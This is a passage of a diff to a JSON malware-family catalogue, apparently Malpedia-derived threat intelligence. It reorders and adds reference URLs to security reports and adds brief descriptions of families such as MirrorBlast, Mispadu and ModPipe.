- "https://www.sentinelone.com/blog/detecting-a-rogue-domain-controller-dcshadow-attack/",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
- "https://twitter.com/inversecos/status/1456486725664993287",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/locked-loaded-and-in-the-wrong-hands-legitimate-tools-weaponized-for-ransomware-in-2021",
- "https://hub.dragos.com/hubfs/116-Whitepapers/Dragos_Intel_WP_InitAccess-IndEnvirons-Final.pdf",
- "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis",
- "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html",
- "https://www.ic3.gov/Media/News/2021/210527.pdf",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://www.theta.co.nz/news-blogs/cyber-security-blog/snakes-ladders-the-offensive-use-of-python-on-windows/",
- "https://attack.mitre.org/groups/G0011",
- "https://www.matteomalvica.com/blog/2020/01/30/mimikatz-lsass-dump-windg-pykd/",
- "https://asec.ahnlab.com/ko/39682/",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-152A_Karakurt_Data_Extortion_Group.pdf",
- "https://attack.mitre.org/groups/G0034",
- "https://bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf",
- "https://www.intrinsec.com/apt27-analysis/",
- "https://www.verfassungsschutz.de/download/broschuere-2021-01-bfv-cyber-brief-2021-01.pdf",
- "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
- "https://noticeofpleadings.com/nickel/#",
- "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/",
- "https://www.varonis.com/blog/hive-ransomware-analysis",
- "https://www.infinitumit.com.tr/en/conti-ransomware-group-behind-the-karakurt-hacking-team/",
- "https://github.com/gentilkiwi/mimikatz",
- "https://securelist.com/the-sessionmanager-iis-backdoor/106868/",
- "https://volatility-labs.blogspot.com/2021/10/memory-forensics-r-illustrated.html",
- "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/",
- "https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/",
- "https://attack.mitre.org/groups/G0096",
- "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/",
- "http://www.secureworks.com/research/threat-profiles/gold-burlap",
 "https://unit42.paloaltonetworks.com/atoms/obscureserpens/",
- "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass",
+ "https://assets.virustotal.com/reports/2021trends.pdf",
+ "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
+ "https://www.infinitumit.com.tr/en/conti-ransomware-group-behind-the-karakurt-hacking-team/",
 "https://www.devo.com/blog/detect-and-investigate-hafnium-using-devo/",
- "https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains",
+ "https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics",
+ "https://twitter.com/inversecos/status/1456486725664993287",
+ "https://hub.dragos.com/hubfs/116-Whitepapers/Dragos_Intel_WP_InitAccess-IndEnvirons-Final.pdf",
 "https://www.secureworks.com/research/threat-profiles/tin-woodlawn",
 "https://www.secureworks.com/research/threat-profiles/gold-kingswood",
- "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom",
- "https://www.hvs-consulting.de/lazarus-report/",
- "http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle",
- "http://www.secureworks.com/research/threat-profiles/gold-franklin",
- "https://www.secureworks.com/research/threat-profiles/gold-drake",
- "https://blog.reversinglabs.com/blog/threat-analysis-follina-exploit-powers-live-off-the-land-attacks",
- "https://news.sophos.com/en-us/2021/05/18/the-active-adversary-playbook-2021/?cmp=37153",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/china-apt-antlion-taiwan-financial-attacks",
+ "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis",
+ "https://www.theta.co.nz/news-blogs/cyber-security-blog/snakes-ladders-the-offensive-use-of-python-on-windows/",
 "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
- "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
- "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf",
- "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/",
- "https://www.microsoft.com/security/blog/2021/12/06/nickel-targeting-government-organizations-across-latin-america-and-europe/",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-campaign-telecoms-asia-middle-east",
- "https://www.secureworks.com/blog/ransomware-deployed-by-adversary",
- "https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran",
- "https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis",
- "https://www.rsa.com/content/dam/en/white-paper/the-shadows-of-ghosts-carbanak-report.pdf",
- "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
- "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html",
- "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachstelle_Detektion_Reaktion.pdf",
- "https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
- "https://www.mandiant.com/resources/unc215-chinese-espionage-campaign-in-israel",
- "https://www.secureworks.com/research/samsam-ransomware-campaigns",
- "https://assets.virustotal.com/reports/2021trends.pdf",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage",
- "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
- "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf",
- "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
- "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/",
- "https://www.slideshare.net/yurikamuraki5/active-directory-240348605",
- "https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection",
- "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf",
- "https://ics-cert.kaspersky.com/media/KASPERSKY_Steganography_in_targeted_attacks_EN.pdf",
- "https://www.f-secure.com/content/dam/f-secure/en/consulting/our-thinking/collaterals/digital/f-secure-consulting-incident-readiness-proactive-response-guide-2020.pdf",
- "https://paraflare.com/attack-lifecycle-detection-of-an-operational-technology-breach/",
- "https://www.microsoft.com/security/blog/2021/11/18/iranian-targeting-of-it-sector-on-the-rise/",
- "https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html",
- "https://awakesecurity.com/blog/catching-the-white-stork-in-flight/",
- "https://5851803.fs1.hubspotusercontent-na1.net/hubfs/5851803/Russian%20Ransomware%20C2%20Network%20Discovered%20in%20Censys%20Data.pdf",
- "https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics",
- "https://labs.f-secure.com/blog/catching-lazarus-threat-intelligence-to-real-detection-logic-part-two",
- "https://www.secureworks.com/research/threat-profiles/bronze-vinewood",
- "https://www.accenture.com/us-en/blogs/cyber-defense/double-extortion-campaigns",
- "https://twitter.com/swisscom_csirt/status/1354052879158571008",
- "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers",
- "https://unit42.paloaltonetworks.com/trigona-ransomware-update/",
- "https://www.accenture.com/us-en/blogs/security/ransomware-hades",
- "https://blogs.blackberry.com/en/2022/09/the-curious-case-of-monti-ransomware-a-real-world-doppelganger",
 "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
+ "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/",
+ "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
+ "https://www.sentinelone.com/blog/detecting-a-rogue-domain-controller-dcshadow-attack/",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/locked-loaded-and-in-the-wrong-hands-legitimate-tools-weaponized-for-ransomware-in-2021",
+ "http://www.secureworks.com/research/threat-profiles/gold-burlap",
+ "https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html",
+ "https://ti.qianxin.com/blog/articles/Operation-OceanStorm:The-OceanLotus-hidden-under-the-abyss-of-the-deep/",
+ "https://attackiq.com/2022/06/03/attack-graph-response-to-us-cert-aa22-152a-karakurt-data-extortion-group/",
+ "https://www.welivesecurity.com/2022/09/06/worok-big-picture/",
+ "https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/",
+ "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers",
+ "https://github.com/gentilkiwi/mimikatz",
+ "https://asec.ahnlab.com/ko/39682/",
+ "http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle",
+ "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html",
+ "https://ics-cert.kaspersky.com/media/KASPERSKY_Steganography_in_targeted_attacks_EN.pdf",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/double-extortion-campaigns",
+ "https://www.crowdstrike.com/blog/overwatch-elite-call-escalation-vital-to-containing-attack/",
+ "https://www.zdnet.com/article/fbi-says-an-iranian-hacking-group-is-attacking-f5-networking-devices/",
+ "https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware",
+ "https://www.ic3.gov/media/news/2020/200917-1.pdf",
+ "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks",
+ "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos",
+ "https://www.secureworks.com/blog/ransomware-deployed-by-adversary",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://asec.ahnlab.com/ko/56256/",
+ "https://blog.reversinglabs.com/blog/threat-analysis-follina-exploit-powers-live-off-the-land-attacks",
+ "https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html",
+ "https://blogs.blackberry.com/en/2022/09/the-curious-case-of-monti-ransomware-a-real-world-doppelganger",
+ "https://twitter.com/swisscom_csirt/status/1354052879158571008",
+ "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/",
+ "https://labs.f-secure.com/blog/catching-lazarus-threat-intelligence-to-real-detection-logic-part-two",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-152A_Karakurt_Data_Extortion_Group.pdf",
+ "https://securelist.com/the-lazarus-group-deathnote-campaign/109490/",
+ "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/",
+ "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf",
+ "https://volatility-labs.blogspot.com/2021/10/memory-forensics-r-illustrated.html",
+ "https://news.sophos.com/en-us/2021/05/18/the-active-adversary-playbook-2021/?cmp=37153",
+ "http://www.secureworks.com/research/threat-profiles/gold-franklin",
+ "https://blog.xpnsec.com/exploring-mimikatz-part-1/",
+ "https://www.secureworks.com/research/samsam-ransomware-campaigns",
 "https://www.crowdstrike.com/blog/credential-theft-mimikatz-techniques/",
- "https://www.welivesecurity.com/2022/09/06/worok-big-picture/"
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://noticeofpleadings.com/nickel/#",
+ "https://www.microsoft.com/security/blog/2021/11/18/iranian-targeting-of-it-sector-on-the-rise/",
+ "https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains",
+ "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachstelle_Detektion_Reaktion.pdf",
+ "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf",
+ "https://www.mandiant.com/resources/unc215-chinese-espionage-campaign-in-israel",
+ "https://www.mandiant.com/resources/blog/alphv-ransomware-backup",
+ "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf",
+ "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf",
+ "https://securelist.com/the-sessionmanager-iis-backdoor/106868/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
+ "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/",
+ "https://attack.mitre.org/groups/G0034",
+ "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf",
+ "https://awakesecurity.com/blog/catching-the-white-stork-in-flight/",
+ "https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://www.verfassungsschutz.de/download/broschuere-2021-01-bfv-cyber-brief-2021-01.pdf",
+ "https://bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf",
+ "https://www.ic3.gov/Media/News/2021/210823.pdf",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage",
+ "https://www.hvs-consulting.de/lazarus-report/",
+ "https://attack.mitre.org/groups/G0011",
+ "https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730",
+ "http://www.secureworks.com/research/threat-profiles/gold-drake",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx",
+ "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/",
+ "https://www.varonis.com/blog/hive-ransomware-analysis",
+ "https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-vinewood",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection",
+ "https://www.microsoft.com/security/blog/2021/12/06/nickel-targeting-government-organizations-across-latin-america-and-europe/",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom",
+ "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html",
+ "https://www.secureworks.com/research/threat-profiles/gold-drake",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-campaign-telecoms-asia-middle-east",
+ "https://www.ic3.gov/Media/News/2021/210527.pdf",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
+ "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/",
+ "https://www.rsa.com/content/dam/en/white-paper/the-shadows-of-ghosts-carbanak-report.pdf",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/",
+ "https://www.cisa.gov/sites/default/files/2023-09/aa23-250a-apt-actors-exploit-cve-2022-47966-and-cve-2022-42475.pdf",
+ "https://www.slideshare.net/yurikamuraki5/active-directory-240348605",
+ "https://www.f-secure.com/content/dam/f-secure/en/consulting/our-thinking/collaterals/digital/f-secure-consulting-incident-readiness-proactive-response-guide-2020.pdf",
+ "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass",
+ "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/china-apt-antlion-taiwan-financial-attacks",
+ "https://www.intrinsec.com/apt27-analysis/",
+ "https://attack.mitre.org/groups/G0096",
+ "https://www.matteomalvica.com/blog/2020/01/30/mimikatz-lsass-dump-windg-pykd/",
+ "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-hickman",
+ "https://unit42.paloaltonetworks.com/trigona-ransomware-update/",
+ "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html",
+ "http://www.secureworks.com/research/threat-profiles/gold-kingswood",
+ "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
+ "https://paraflare.com/attack-lifecycle-detection-of-an-operational-technology-breach/",
+ "https://5851803.fs1.hubspotusercontent-na1.net/hubfs/5851803/Russian%20Ransomware%20C2%20Network%20Discovered%20in%20Censys%20Data.pdf",
+ "https://www.infinitumit.com.tr/apt-35/",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-152a",
+ "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia",
+ "https://www.accenture.com/us-en/blogs/security/ransomware-hades",
+ "https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran",
+ "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/",
+ "https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html"
 ],
 "synonyms": [],
 "type": []
@@ -33886,12 +35475,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.minebridge",
+ "https://www.zscaler.com/blogs/security-research/demystifying-full-attack-chain-minebridge-rat",
 "https://www.bleepingcomputer.com/news/security/windows-finger-command-abused-by-phishing-to-download-malware/",
- "https://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures",
- "https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html",
- "https://blog.morphisec.com/minebridge-on-the-rise-sophisticated-delivery-mechanism",
 "https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/",
- "https://www.zscaler.com/blogs/security-research/demystifying-full-attack-chain-minebridge-rat"
+ "https://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures",
+ "https://blog.morphisec.com/minebridge-on-the-rise-sophisticated-delivery-mechanism",
+ "https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html"
 ],
 "synonyms": [
 "GazGolder"
@@ -33919,15 +35508,15 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.miniduke",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://cybergeeks.tech/how-to-defeat-the-russian-dukes-a-step-by-step-analysis-of-miniduke-used-by-apt29-cozy-bear/",
- "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/",
- "https://www.circl.lu/files/tr-14/circl-analysisreport-miniduke-stage3-public.pdf",
 "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/",
- "https://research.checkpoint.com/2022/native-function-and-assembly-code-invocation/",
+ "https://cybergeeks.tech/how-to-defeat-the-russian-dukes-a-step-by-step-analysis-of-miniduke-used-by-apt29-cozy-bear/",
 "https://www.fireeye.com/blog/threat-research/2013/02/its-a-kind-of-magic-1.html",
+ "https://www.secureworks.com/research/threat-profiles/iron-hemlock",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.circl.lu/files/tr-14/circl-analysisreport-miniduke-stage3-public.pdf",
 "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/",
- "https://www.secureworks.com/research/threat-profiles/iron-hemlock"
+ "https://research.checkpoint.com/2022/native-function-and-assembly-code-invocation/",
+ "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/"
 ],
 "synonyms": [],
 "type": []
@@ -33966,10 +35555,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirage", - "https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf", - "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/", "https://www.secureworks.com/research/threat-profiles/bronze-palace", - "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf" + "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/", + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf" ], "synonyms": [], "type": [] 
@@ -33995,16 +35584,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirai", + "https://twitter.com/PhysicalDrive0/status/830070569202749440", + "https://assets.virustotal.com/reports/2021trends.pdf", + "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", + "https://www.incapsula.com/blog/new-mirai-variant-ddos-us-college.html", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tough-times-for-ukrainian-honeypot/", + "https://blog.netlab.360.com/wo-men-kan-dao-de-wu-ke-lan-bei-ddosgong-ji-xi-jie/", + "https://dev.azure.com/Mastadamus/Mirai%20Botnet%20Analysis/_wiki/wikis/Mirai-Botnet-Analysis.wiki/12/Anatomy-of-An-Mirai-Botnet-Attack", "https://unit42.paloaltonetworks.com/moobot-d-link-devices/", "https://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/", - "https://dev.azure.com/Mastadamus/Mirai%20Botnet%20Analysis/_wiki/wikis/Mirai-Botnet-Analysis.wiki/12/Anatomy-of-An-Mirai-Botnet-Attack", - "https://twitter.com/PhysicalDrive0/status/830070569202749440", - "https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/", - "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", - "https://blog.netlab.360.com/wo-men-kan-dao-de-wu-ke-lan-bei-ddosgong-ji-xi-jie/", - "https://www.incapsula.com/blog/new-mirai-variant-ddos-us-college.html", - "https://assets.virustotal.com/reports/2021trends.pdf" + "https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/" ], "synonyms": [], "type": [] 
@@ -34013,15 +35602,15 @@ "value": "Mirai (Windows)" }, { - "description": "", + "description": "According to Minerva Labs, MirrorBlast malware is a trojan that is known for attacking users\u2019 browsers. It usually pretends to be a legitimate browser add-on however it has now evolved additional capabilities, whereby other malwares are installed simultaneously. Recently, this trojan is thought to have tentative links to TA505 and PYSA groups.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirrorblast", - "https://www.proofpoint.com/us/blog/threat-insight/whatta-ta-ta505-ramps-activity-delivers-new-flawedgrace-variant", "https://www.proofpoint.com/us/daily-ruleset-update-summary-20210924", "https://blog.morphisec.com/explosive-new-mirrorblast-campaign-targets-financial-companies", - "https://frsecure.com/blog/the-rebol-yell-new-rebol-exploit/", - "https://threatresearch.ext.hp.com/mirrorblast-and-ta505-examining-similarities-in-tactics-techniques-and-procedures/" + "https://www.proofpoint.com/us/blog/threat-insight/whatta-ta-ta505-ramps-activity-delivers-new-flawedgrace-variant", + "https://threatresearch.ext.hp.com/mirrorblast-and-ta505-examining-similarities-in-tactics-techniques-and-procedures/", + "https://frsecure.com/blog/the-rebol-yell-new-rebol-exploit/" ], "synonyms": [], "type": [] @@ -34075,8 +35664,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.misha", - "https://blog.bushidotoken.net/2022/11/detecting-and-fingerprinting.html", - "https://bazaar.abuse.ch/sample/efab8bfe43de6edf96f9451a5a2cc15017cfc5c88f81b46b33e6ba5c7e2d7a7b/" + "https://bazaar.abuse.ch/sample/efab8bfe43de6edf96f9451a5a2cc15017cfc5c88f81b46b33e6ba5c7e2d7a7b/", + "https://blog.bushidotoken.net/2022/11/detecting-and-fingerprinting.html" ], "synonyms": [], "type": [] 
@@ -34085,15 +35674,15 @@ "value": "Misha" }, { - "description": "According to ESET Research, Mispadu is an ambitious Latin American banking trojan that utilizes McDonald’s malvertising and extends its attack surface to web browsers. It is used to target the general public and its main goals are monetary and credential theft. In Brazil, ESET has seen it distributing a malicious Google Chrome extension that attempts to steal credit card data and online banking data, and that compromises the Boleto payment system.", + "description": "According to ESET Research, Mispadu is an ambitious Latin American banking trojan that utilizes McDonald\u2019s malvertising and extends its attack surface to web browsers. It is used to target the general public and its main goals are monetary and credential theft. In Brazil, ESET has seen it distributing a malicious Google Chrome extension that attempts to steal credit card data and online banking data, and that compromises the Boleto payment system.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mispadu", - "https://blog.scilabs.mx/en/cyber-threat-profile-malteiro/", - "https://www.welivesecurity.com/2019/11/19/mispadu-advertisement-discounted-unhappy-meal/", - "https://seguranca-informatica.pt/threat-analysis-the-emergent-ursa-trojan-impacts-many-countries-using-a-sophisticated-loader/", - "https://seguranca-informatica.pt/ursa-trojan-is-back-with-a-new-dance/#.YyXEkaRBzIU", "https://blog.scilabs.mx/cyber-threat-profile-malteiro/", + "https://seguranca-informatica.pt/threat-analysis-the-emergent-ursa-trojan-impacts-many-countries-using-a-sophisticated-loader/", + "https://blog.scilabs.mx/en/cyber-threat-profile-malteiro/", + "https://seguranca-informatica.pt/ursa-trojan-is-back-with-a-new-dance/#.YyXEkaRBzIU", + "https://www.welivesecurity.com/2019/11/19/mispadu-advertisement-discounted-unhappy-meal/", 
"https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/mispadu-banking-trojan-resurfaces" ], "synonyms": [ @@ -34109,10 +35698,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mistcloak", - "https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia", - "https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/" + "https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/", + "https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia" + ], + "synonyms": [ + "HIUPAN" ], - "synonyms": [], "type": [] }, "uuid": "1e6bc052-73de-453d-ba6c-658c82fe21d4", 
@@ -34225,13 +35816,13 @@ "value": "MoDi RAT" }, { - "description": "ModPipe is point-of-sale (POS) malware capable of accessing sensitive information stored in devices running ORACLE MICROS Restaurant Enterprise Series (RES) 3700 POS – a management software suite used by hundreds of thousands of bars, restaurants, hotels and other hospitality establishments worldwide. ModPipe uses modular architecture consisting of basic components and downloadable modules. One of them – named GetMicInfo – contains an algorithm designed to gather database passwords by decrypting them from Windows registry values. Exfiltrated credentials allow ModPipe's operators access to database contents, including various definitions and configuration, status tables and information about POS transactions. ", + "description": "ModPipe is point-of-sale (POS) malware capable of accessing sensitive information stored in devices running ORACLE MICROS Restaurant Enterprise Series (RES) 3700 POS \u2013 a management software suite used by hundreds of thousands of bars, restaurants, hotels and other hospitality establishments worldwide. ModPipe uses modular architecture 